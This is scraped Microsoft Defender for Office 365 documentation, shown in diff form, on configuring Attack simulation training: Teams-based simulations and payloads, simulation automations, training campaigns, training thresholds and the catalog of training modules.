- - **How-to Guide**
-
- - On the **[Name simulation](attack-simulation-training-simulations.md#name-and-describe-the-simulation)** page, a **Select sender's Microsoft Teams account** section and **Select user account** link are present. Select **Select user account** to find and select the account to use as the source for the Teams message.
-
- The list of users comes from the **Teams simulation configuration** section on the **Settings** tab of Attack simulation training at <https://security.microsoft.com/attacksimulator?viewid=setting>. Configuring accounts is described in the [Teams simulation configuration](#teams-simulation-configuration) section earlier in this article.
-
- - On the **[Select payload and login page](attack-simulation-training-simulations.md#select-a-payload-and-login-page)**, no payloads are listed by default because there are no built-in payloads for Teams. You need to create a payload for the combination of Teams and the social engineering technique that you selected.
-
- The differences in creating payloads for Teams are described in the [Changes in payloads for Microsoft Teams](#changes-in-payloads-for-microsoft-teams) section in this article.
-
- - On the **[Target users](attack-simulation-training-simulations.md#target-users)** page, the following settings are different for Teams:
- - As noted on the page, guest users in Teams are excluded from simulations.
-
-Other settings related to simulations are the same for Teams messages as described in the existing content for email messages.
-
-## Changes in payloads for Microsoft Teams
-
-Whether you create a payload on the **Payloads** page of the **Content library** tab or on the **[Select payload and login page](attack-simulation-training-simulations.md#select-a-payload-and-login-page)** page in the new simulation wizard, Teams introduces the following changes to viewing and creating payloads as described in [Payloads in Attack simulation training in Defender for Office 365](attack-simulation-training-payloads.md):
--- On the **Global payloads** and **Tenant payloads** tabs on **Payloads** page of the **Content library** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>, the **Platform** column shows the value **Teams** for payloads that use Teams messages.-
- If you select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to filter the list of existing payloads, a **Platform** section is available where you can select **Email** and **Teams**.
-
- As previously described, there are no built-in payloads for Teams, so if you filter by **Status** \> **Teams** on the **Global payloads** tab, the list will be empty.
--- If you select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create a payload** on the **Tenant payload** tab to create a payload, the first page of the new payload wizard is **Select type** where you can select **Teams**. Selecting **Teams** introduces the following changes to the rest of the new payload wizard:-
- - On the **[Select technique](attack-simulation-training-payloads.md#create-payloads)** page, the **Malware Attachment** and **Link in Attachment** social engineering techniques aren't available for Teams.
-
- - The **Configure payload** page has the following changes for Teams:
- - **Sender details** section: The only available setting for Teams is **Chat topic** where you enter a tile for the Teams message.
- - The last section isn't named **Email message**, but it functions the same way for Teams messages as it does for email messages:
- - There's an **Import Teams message** button to import an existing plain text message file to use as a starting point.
- - The **Dynamic tag** and **Phishing link** controls are available on the **Text** tab, and **Code** tab is available as with email messages.
-
-Other settings related to payloads are the same for Teams messages as described in the existing content for email messages.
-
-## Changes in simulation automations for Microsoft Teams
-
-Teams introduces the following changes to viewing and creating simulation automations as described in [Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md):
--- On the **Simulation automations** page of the **Automations** tab at <https://security.microsoft.com/attacksimulator?viewid=automations>, the following columns are also available:
- - **Type**: Currently, this value is always **Social engineering**.
- - **Platform**: Shows the value **Teams** for payload automations that use Teams messages or **Email** for payload automations that use email messages.
--- If you select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create automation** on the **Simulation automations** page to create a simulation automation, the first page of the new simulation automation wizard is **Select delivery platform** where you can select **Teams**. Selecting **Teams** introduces the following changes to the rest of the new simulation automation wizard:-
- - On the [Automation name](attack-simulation-training-simulation-automations.md#name-and-describe-the-simulation-automation) page, the following settings are available for Teams in the **Select method for choosing sender accounts** section:
- - **Manually select**: This value is selected by default. In the **Select sender's Microsoft Teams account** section, select the **Select user account** to find and select the account to use as the source for the Teams message.
- - **Randomize**: Randomly select from the available accounts to use as the source for the Teams message.
-
- - On the **[Select social engineering techniques](attack-simulation-training-simulation-automations.md#select-one-or-more-social-engineering-techniques)** page, the **Malware Attachment** and **Link in Attachment** social engineering techniques aren't available for Teams.
-
- - On the **[Select payloads and login page](attack-simulation-training-simulation-automations.md#select-payloads-and-login-pages)** page, no payloads are listed by default because there are no built-in payloads for Teams. You might need to create a payload for the combination of Teams and the social engineering techniques that you selected.
-
- The differences in creating payloads for Teams are described in the [Changes in payloads for Microsoft Teams](#changes-in-payloads-for-microsoft-teams) section in this article.
-
- - On the **[Target users](attack-simulation-training-simulation-automations.md#target-users)** page, the following settings are different for Teams:
- - As noted on the page, simulation automations that use Teams can target a maximum of 1000 users.
- - if you select **Include only specific users and groups**, **City** isn't an available filter in the **Filter users by category** section.
-
-Other settings related to simulation automations are the same for Teams messages as described in the existing content for email messages.
security Attack Simulation Training Training Campaigns https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-training-campaigns.md
- Title: Training campaigns in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to create training campaigns in Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/11/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Training campaigns in Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, Training campaigns are a faster, more direct way to provide security training to users. Instead of creating and launching [simulated phishing attacks](attack-simulation-training-simulations.md) that eventually lead to training, you can create and assign Training campaigns directly to users.
-
-A Training campaign contains one or more built-in Training modules that you select. Currently, there are over 70 Training modules to select from. For more information about Training modules, see [Training modules for Training campaigns in Attack simulation training](attack-simulation-training-training-modules.md).
-
-For getting started information about Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-To see the existing Training campaigns, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Training** tab. Or, to go directly to the **Training** tab, use <https://security.microsoft.com/attacksimulator?viewid=trainingcampaign>.
-
-The **Training** tab sows the following information for each Training campaign that you created. You can sort the Training campaigns by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Campaign name**-- **Description**-- **Total duration (mins)**-- **Training completion date**-- **Training completion**: The number of users who were included in the Training campaign and how many of them completed the training. The information is shown as a fraction (for example, **2/5**) and in a corresponding horizontal bar graph.-- **No. of training modules**: The number of training modules that are included in the Training campaign.-- **Created by**-- **Created time**-- **Status**: One of the following values:
- - **Completed**<sup>\*\*</sup>
- - **In progress**<sup>\*\*</sup>
- - **Draft**<sup>\*\*</sup>
- - **Canceled**
- - **Deleted**
- - **Failed**<sup>\*\*</sup>
- - **Scheduled**<sup>\*\*</sup>
-
- For more information about the **Status** values, see the [Set the training threshold](#set-the-training-threshold) section later in this article.
-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png"::: **Filter** to filter the information on the page by the **Status** value of the Training campaign.
-
-<sup>\*\*</sup> The total count of Training campaigns with these **Status** values is also shown at the top of the page. But if you filter the information (for example, exclude on of these **Status** values), the count at the top of the page is **0** for that excluded **Status** value.
-
-To find a Training campaign in the list, type part of the campaign name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png"::: **Search** box and then press the ENTER key.
-
-To see details about in-progress or completed Training campaigns, see the [View Training campaign reports](#view-training-campaign-reports) section.
-
-## Create Training campaigns
-
-To create a Training campaign, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Training** tab. Or, to go directly to the **Training** tab, use <https://security.microsoft.com/attacksimulator?viewid=trainingcampaign>.
-
-2. On the **Training** tab, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png"::: **Create new** to start the new Training campaign wizard.
-
- The following sections describe the steps and configuration options to create a Training campaign.
-
- > [!NOTE]
- > At any point after you name the Training campaign during the new Training campaign wizard, you can select **Save and close** to save your progress and continue later. The incomplete Training campaign has the **Status** value **Draft**. You can pick up where you left off by selecting the Training campaign and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
-
-### Name and describe the Training campaign
-
-On the **Name campaign** page, configure the following settings:
--- **Name**: Enter a unique name for the Training campaign.-- **Description**: Enter an optional description.-
-When you're finished on the **Name Training campaign** page, select **Next**.
-
-### Target users
-
-On the **Target users** page, select who receives the Training campaign. Use the following options to select users:
--- **Include all users in my organization**: The unmodifiable list of users is show in groups of 10. You can use **Next** and **Previous** directly below the list of users to scroll through the list. You can also use :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** to find specific users.-
- > [!TIP]
- > Although you can't remove users from the list on this page, you can use the next **Exclude users** page to exclude specific users.
--- **Include only specific users and groups**: At first, no users or groups are shown on the **Targeted users** page. To add users or groups to the Training campaign, choose one of the following options:-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users**: In the **Add users** flyout that opens, you find and select users and groups to include in the Training campaign. **Dynamic distribution groups are not supported**. The following search tools are available:
-
- - **Search for users or groups**: If you click in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and do one of the following actions, the **Filter users by categories** options on the **Add users** flyout are replaced by a **User list** section:
-
- - Type three or more characters and then press the ENTER key. Any users or group names that contain those characters are shown in the **User list** section by **Name**, **Email**, **Job title**, and **Type**.
- - Type less than three characters or no characters and then press the ENTER key. No users are shown in the **User list** section, but you can type three or more characters in the **Search** box to search for users and groups.
-
- The number of results appears in the **Selected (0/x) users** label.
-
- > [!TIP]
- > Selecting **Add filters** clears and replaces any results the **User list** section with the **Filter users by categories**.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select **Add x users** to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - **Filter users by categories**: Use the following options:
-
- - **Suggested user groups**: Select from the following values:
- - **All suggested user groups**: The same result as selecting **Users not targeted by a simulation in the last three months** and **Repeat offenders**.
- - **Users not targeted by a simulation in the last three months**
- - **Repeat offenders**: For more information, see [Configure the repeat offender threshold](attack-simulation-training-settings.md#configure-the-repeat-offender-threshold).
-
- - **User tags**: User tags are identifiers for specific groups of users (for example, Priority accounts). For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md). Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by user tags**, you can type part of the user tag name and then press Enter. You can select some or all of the results.
- - Select **All user tags**
- - Select existing user tags. If the link is available, select **See all user tags** to see the complete list of available tags.
-
- - **City**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by City**, you can type part of the City value and then press Enter. You can select some or all of the results.
- - Select **All City**
- - Select existing City values. If the link is available, select **See all Cities** to see the complete list of available City values.
-
- - **Country**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Country**, you can type part of the Country/region value and then press Enter. You can select some or all of the results.
- - Select **All Country**
- - Select existing City values. If the link is available, select **See all Countries** to see the complete list of available Country/region values.
-
- - **Department**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Department**, you can type part the Department value and then press Enter. You can select some or all of the results.
- - Select **All Department**
- - Select existing Department values. If the link is available, select **See all Departments** to see the complete list of available Department values.
-
- - **Title**: Use the following options:
- - **Search**: In :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search by Title**, you can type part of the Title value and then press Enter. You can select some or all of the results.
- - Select **All Title**
- - Select existing Title values. If the link is available, select **See all Titles** to see the complete list of available Title values.
-
- :::image type="content" source="../../media/attack-sim-training-simulations-target-users-filter-by-category.png" alt-text="The User filtering on the Target users page in Attack simulation training in the Microsoft Defender portal" lightbox="../../media/attack-sim-training-simulations-target-users-filter-by-category.png":::
-
- You can use some or all of the search categories to find users and groups. If you select multiple categories, the AND operator is used. Any users or groups must match both values to be returned in the results (which is virtually impossible if you use the value **All** in multiple categories).
-
- The number of values that were used as the search criteria by a specific category is shown next to the category tile (for example, **City 50** or **Priority accounts 10**).
-
- When you're finished searching by category, select the **Apply(x)** button. The previous **Filter users by categories** options on the **Add users** flyout are replaced by the following information:
-
- - **Filters** section: Show how many filter values you used and the names of the filter values. If it's available, select the **See all** link to see all filter values
- - **User list** section: Shows the users or groups that match your category searches. The number of results appears in the **Selected (0/x) users** label.
-
- When you have a list of users or groups in the **User list** section, select some or all of the results by selecting the check box next to the **Name** column. The number of selected results appears in the **Selected (y/x) users** label.
-
- Select the **Add x users** button to add the selected users or groups on the **Target users** page and to return to the **Target users** page.
-
- - :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import**: In the dialog that opens, specify a CSV file that contains one email address per line.
-
- After you find a select the CSV file, the users are imported and shown on the **Targeted users** page.
-
- On the main **Target users** page, you can use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box to find selected users. You can also select :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Delete** and then **Confirm** in the confirmation dialog to remove specific users.
-
- To add more users and groups, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add users** or :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Import** on the **Target users** page and repeat the previous steps.
-
-When you're finished on the **Target users** page, select **Next**.
-
-### Exclude users
-
-On the **Exclude users** page, you can exclude some of the previously selected users from the Training campaign by selecting **Exclude some of the target users from this simulation**.
-
-The selection options are identical to the previous step when you select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png"::: **Add users to exclude** or :::image type="icon" source="../../media/m365-cc-sc-import-icon.png"::: **Import**.
-
-When you're finished on the **Exclude users** page, select **Next**.
-
-### Select training modules
-
-On the **Select training modules** page, select one of the following options:
--- **Training catalog**: Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png"::: **Add trainings**.-
- In the **Add Training** flyout that opens, select one or more Training modules to include in the Training campaign by selecting the check box next to the module name, and then select **Add**.
-
- The modules that are available in the **Add Training** flyout are identical to the modules that are available at **Training modules** on the **Content library** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>. For more information, see [Training modules for Training campaigns in Attack simulation training](attack-simulation-training-training-modules.md).
-
- After you've selected one or more Training modules, the following information is shown for each entry on the **Select courses** page:
-
- - **Training name**
- - **Source**
- - **Duration (mins)**
- - **Delete**: Use the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png"::: **Delete** icon to remove the entry from the list. Select **Confirm** in the confirmation dialog**.
--- **Redirect to a custom URL**: Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png"::: **Add trainings**.-
- In the **Custom training URL** flyout that opens, the following options are available:
-
- - **Custom training URL** (required)
- - **Custom training name** (required)
- - **Custom training description**
- - **Custom training duration (in minutes)** (required): The default value is 0, which means there's no specified duration for the training.
-
- When you're finished on the **Custom training URL** flyout, select **Add**. Information about the custom URL is visible on the **Select courses** page.
-
-When you're finished on the **Select courses** page, select **Next**.
-
-### Select end user notifications
-
-On the **Select end user notification** page, select from the following notification options:
--- **Microsoft default notification (recommended)**: The notifications that users will receive are shown on the page:
- - **Microsoft default training only campaign-training assignment notification**
- - **Microsoft default training only campaign-training reminder notification**
-
- Select the default language to use in **Select default language**. The available values are: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **English**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Spanish**, **Dutch**, **Polish**, **Arabic**, **Finnish**, **Greek**, **Hungarian**, **Indonesian**, **Norwegian Bokmål**, **Romanian**, **Slovak**, **Swedish**, **Thai**, **Turkish**, **Vietnamese**, **Catalan**, **Croatian, or **Slovenian**.
-
- For each notification, the following information is available:
-
- - **Notifications**: The name of the notification.
- - **Language**: If the notification contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).
- - **Type**: One of the following values:
- - **Training assignment notification**
- - **Training reminder notification**
- - **Delivery preferences**: You need to configure the following delivery preferences before you can continue:
- - For **Microsoft default training only campaign-training reminder notification**, select **Twice a week** or **Weekly**.
- - **Actions**: If you select :::image type="icon" source="../../media/m365-cc-sc-view-icon.png" border="false"::: **View**, a **Review notification** page opens with the following information:
- - **Preview** tab: View the notification message as users see it. To view the message in different languages, use the **Select notification language** box.
- - **Details** tab: View details about the notification:
- - **Notification description**
- - **Source**: For built-in notifications, the value is **Global**. For custom notifications, the value is **Tenant**.
- - **Notification type**: One of the following types based on the notification you originally selected:
- - **Training assignment notification**
- - **Training reminder notification**
- - **Modified by**
- - **Last modified**
-
- When you're finished on the **Review notification** page, select **Close** to return to the **Select end user notification** page.
--- **Customized end user notifications**: No other configuration options are available on the page. When you select **Next**, you need to select a **Training assignment notification** and a **Training reminder notification** to use for the Training campaign as described in the next two subsections.-
-When you're finished on the **Select end user notification** page, select **Next**.
-
-#### Select a training assignment notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training assignment notification** page shows the following notifications and their configured languages:
--- **Microsoft default training assignment notification**-- **Microsoft default training only campaign-training assignment notification**-- Any custom training assignment notifications that you previously created.-
-These notifications are also available on the **End user notifications** page on the **Content library** tab:
--- Built-in training assignment notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training assignment notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-Do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training assignment notification** page, select a notification to use by selecting the check box next to the name.
--- Create a new notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training assignment notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training assignment notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Training assignment notification** page, select **Next**.
-
-#### Select a training reminder notification
-
-> [!NOTE]
-> This page is available only if you selected **Customized end user notifications** on the [Select end user notifications](#select-end-user-notifications) page.
-
-The **Training reminder notification** page shows the following notifications and their configured languages:
--- **Microsoft default training reminder notification**-- **Microsoft default training only campaign-training reminder notification**-- Any custom training reminder notifications that you previously created.-
-These notifications are also available at **Attack simulation training** \> **Content library** tab \> **End user notifications**:
--- Built-in training reminder notifications are available on the **Global notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=global>.-- Custom training reminder notifications are available on the **Tenant notifications** tab at <https://security.microsoft.com/attacksimulator?viewid=contentlibrary&source=tenant>.-
-For more information, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-In **Set frequency for reminder notification**, select **Weekly** (the default value) or **Twice a week**, and then do one of the following steps:
--- Select an existing notification to use:
- - To search for an existing notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
- - When you select a notification by clicking anywhere in the row other than the check box, a details flyout opens that shows more information about the notification:
- - The **Preview** tab shows what the notification looks like to users.
- - The **Details** tab shows the properties of the notification.
-
- When you're finished in the notification details flyout, select **Close**.
-
- On the **Training reminder notification** page, select a notification to use by selecting the check box next to the name.
--- Create a new notification to use: Select :::image type="icon" source="../../medi#create-end-user-notifications).-
- > [!NOTE]
- > On the **Define details** page of the new notification wizard, be sure to select the value **Training reminder notification** for the notification type.
-
- When you're finished creating the notification, you return to the **Training reminder notification** page where the new notification now appears in the list for you to select.
-
-When you're finished on the **Training reminder notification** page, select **Next**.
-
-### Schedule the Training campaign
-
-On the **Schedule** page, you choose when to start and end the Training campaign by choosing one of the following values:
--- **Launch this Training campaign as soon as I'm done**-
- If you select **Send training with an end date** (it's selected by default), you need to configure the end date/time in **Set the campaign end date** and **Set hours**, **Set minutes**, and **Set time format**.
--- **Schedule this Training campaign to be launched later**: Enter the Training campaign start date/time in **Set the campaign launch date** and **Set hours**, **Set minutes**, and **Set time format**.-
- If you select **Send training with an end date** (it's selected by default), you need to configure the end date/time in **Set the campaign end date** and **Set hours**, **Set minutes**, and **Set time format**.
-
-> [!NOTE]
-> If you clear the **Send training with an end date** check box, no reminder notifications will be send to the targeted users outside of the initial training assignment notice.
-
-When you're finished on the **Schedule** page, select **Next**.
-
-## Review Training campaign details
-
-On the **Review** page, you can review the details of the Training campaign.
-
-Select the :::image type="icon" source="../../media/m365-cc-sc-send-icon.png" border="false"::: **Send a test** button to send a copy of the Training campaign to yourself (the currently signed in user) for inspection.
-
-You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard to modify the settings.
-
-When you're finished on the **Review** page, select **Submit**.
-
-Back on the **Training campaign** tab, the Training campaign that you created is now listed. The **Status** value depends on your previous selection in the [Schedule the Training campaign](#schedule-the-training-campaign) step:
--- **In progress** if you selected **Launch this Training campaign as soon as I'm done**.-- **Scheduled** if you selected **Schedule this Training campaign to be launched later**.-
-## Take action on Training campaigns
-
-All actions on existing Training campaigns start on the **Training** tab. To go there, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Training** tab. Or, to go directly to the **Training** tab, use <https://security.microsoft.com/attacksimulator?viewid=trainingcampaign>.
-
-### Cancel Training campaigns
-
-You can cancel Training campaigns with the **Status** value **In progress** or **Scheduled**.
-
-To cancel an existing Training campaign on the **Training tab**, select the Training campaign by selecting the check box next to the name, select the :::image type="icon" source="../../media/m365-cc-sc-close-icon.png" border="false"::: **Cancel** action that appears, and then select **Confirm** in the confirmation dialog.
-
-After you cancel the Training campaign, the **Status** value changes to **Canceled**.
-
-### Remove Training campaigns
-
-You can't remove Training campaigns with the **Status** value **In progress** or **Scheduled**.
-
-To remove an existing Training campaign from the **Training** tab, select the Training campaign by selecting the check box next to the name, select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears, and then select **Confirm** in the confirmation dialog.
-
-After you remove the Training campaign, it's no longer listed on the **Training** tab.
-
-## Set the training threshold
-
-The _training threshold_ prevents users from having the same trainings assigned to them during a specific interval in days. The default value is 90 days.
-
-During the time interval, the same training module won't be reassigned to users who meet either of the following criteria:
--- They completed the training module during the training threshold.-- They haven't completed the training module, but the module was assigned to them during the training threshold.-
-The training threshold starts when a training module is assigned to a user.
-
-We recommend that the training threshold is greater than the number of days that a user has to complete a training module.
-
-In the training campaign user report, the **Status** value shows the effect of the training threshold on users and their assigned trainings modules:
--- **Completed**: The user completed the training module.-- **In Progress**: The user started the training module.-- **Not Started**: The user hasn't started the training module.-- **Training Previously Assigned**: The training module was assigned to the user during the training threshold, but the user hasn't completed the training yet. The user can still complete the training module, at which point the **Status** value changes to **Completed**.-- **Overdue**: The user hasn't completed the training module before the assigned due date and the same training module hasn't been reassigned to the user during the training threshold.-- **Not Completed**: The user hasn't completed the training module within the assigned due date and/or outside the training threshold. This status makes the user eligible to have the same training module reassigned to them.-
-You set the training threshold on the **Settings** tab on the **Attack simulation training** page. For more information about the **Settings** tab, see [Global settings in Attack simulation training](attack-simulation-training-settings.md).
-
-To set the training threshold on the **Settings** tab, do the following steps:
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Settings** tab. Or, to go directly to the **Settings** tab, use <https://security.microsoft.com/attacksimulator?viewid=setting>.
-
-2. Set the value in days for the training threshold time period. The default value is 90 days. To remove the training threshold and always assign training, set value to 0.
-
-3. When you're finished on the **Settings** tab, select **Save**.
-
-## View Training campaign reports
-
-For Training campaigns with the **Status** value **In progress** or **Completed**, you can view the report for the Training campaign by using either of the following methods on the **Training campaigns** tab at <https://security.microsoft.com/attacksimulator?viewid=trainingcampaign>
--- Select the campaign by clicking anywhere in the row other than the check box next to the name.-- Select the campaign by selecting the check box next to the name, and then select :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **View report**.-
-A details page for the Training campaign opens with the following tabs:
--- **Report**-- **Users**-- **Details**-
-These tabs are described in the following subsections.
-
-To close the Training campaign report, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close**.
-
-### Report tab
-
-For a description of what's on the **Report** tab for Training campaigns, see [Simulation report for Training campaigns](attack-simulation-training-insights.md#simulation-report-for-training-campaigns)
-
-### Users tab
-
-The **Users** tab contains the following information for each user in the campaign. You can sort the users by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. The default columns are marked with an asterisk (<sup>\*</sup>):
--- **Name**<sup>\*</sup> (you can't deselect this value)-- **Training status**<sup>\*</sup>: One of the following values:
- - **Not started**: The user hasn't started any Training modules in the campaign.
- - **In progress**: The user has completed some Training modules in the campaign.
- - **Completed**: The user has completed all Training modules in the campaign.
- - **Overdue**: The user hasn't completed all Training modules by the campaign end date/time.
-- **Training completion date**<sup>\*</sup> (you can't deselect this value)-- **Username**<sup>\*</sup> (you can't deselect this value)-- **Department**-
-To change the list of users from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png"::: **Export** to download the displayed results to a RecordExport.csv file in the local Downloads folder.
-
-If you select a user from the list by clicking anywhere in the row other than the check box next to the name, the following user information appears in a details flyout:
--- **User details** section:
- - **Company**
- - **IP address**
- - **Job title**
- - **Department**
- - **Location**
- - **Manager**
-- Status information for Training modules in the Training campaign for the user:
- - **Training name**: The training module name.
- - **Training status**: **Not started**, **In progress**, **Completed**, **Training Previously Assigned**, **Overdue**, or **Not Completed**.
- - **Training start date**
- - **Training completed date**
-
-> [!TIP]
-> To see details about other users in the Training campaign without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-### Details tab
-
-The **Details** tab the following information:
--- **Description**-- **Schedule details**: The launch date/time and the end date/time.-- **Notifications**: Whether training assignment notifications and training reminder notifications are enabled, and their delivery frequency.-- **Selected modules**: The Training modules in the Training campaign are listed in a table:
- - **Module name**
- - **Content type**
- - **Total duration (mins)**
security Attack Simulation Training Training Modules https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-training-modules.md
- Title: Training modules for Training campaigns in Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn about the Training modules that are available to use in Training campaigns in Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/11/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Training modules for Training campaigns in Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, you select one or more Training modules to include in Training campaigns that you create and assign to users. For more information about Training campaigns, see [Training campaigns in Attack simulation training](attack-simulation-training-training-campaigns.md).
-
-To see the available Training modules, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **Training modules**. Or, to go directly to the **Content library** tab where you can select **Training modules**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-The **Training modules** page shows the following information for each module. You can sort the modules by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Training name**-- **Languages**: The available values are: **Turkish**, **Polish**, **Persian**, **Danish**, **Slovak**, **Korean**, **Portuguese**, **Italian**, **German**, **French**, **Swedish**, **Spanish**, **Arabic**, **Norwegian Bokmål**, **Russian**, **Portuguese**, **Japanese**, **Czech**, **Greek**, **Spanish**, **Thai**, **Romanian**, **French**, **Hungarian**, **Chinese (Simplified)**, **English**, **Indonesian**, **Finnish**, **Malay**, **English**, **Hindi**, **Chinese (Traditional**, **Hong Kong)**, **Chinese (Traditional**, **Taiwan)**, **Macedonian**, **Ukrainian**, **Vietnamese**, **Hebrew**, **Serbian (Cyrillic)/Serbian (Latin)**, and **Dutch**-- **Tags**: Training modules are organized into one or more of the following categories:
- - **AttachmentMalware**
- - **Basic**
- - **Compliance**
- - **Compromised**
- - **CredentialHarvesting**
- - **DriveByURL**
- - **LinkInAttachment**
- - **LinkToMalwareFile**
- - **OAuthConsentGrant**
- - **Phishing**
- - **SocialEngineering**
-- **Source**: All built-in modules have the value **Global**.-- **Duration (mins)**-- **Last assigned date**-- **# times used**-- **Completion rate**-- **Preview**: Select the **Preview** button in this column to watch the training.-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
-
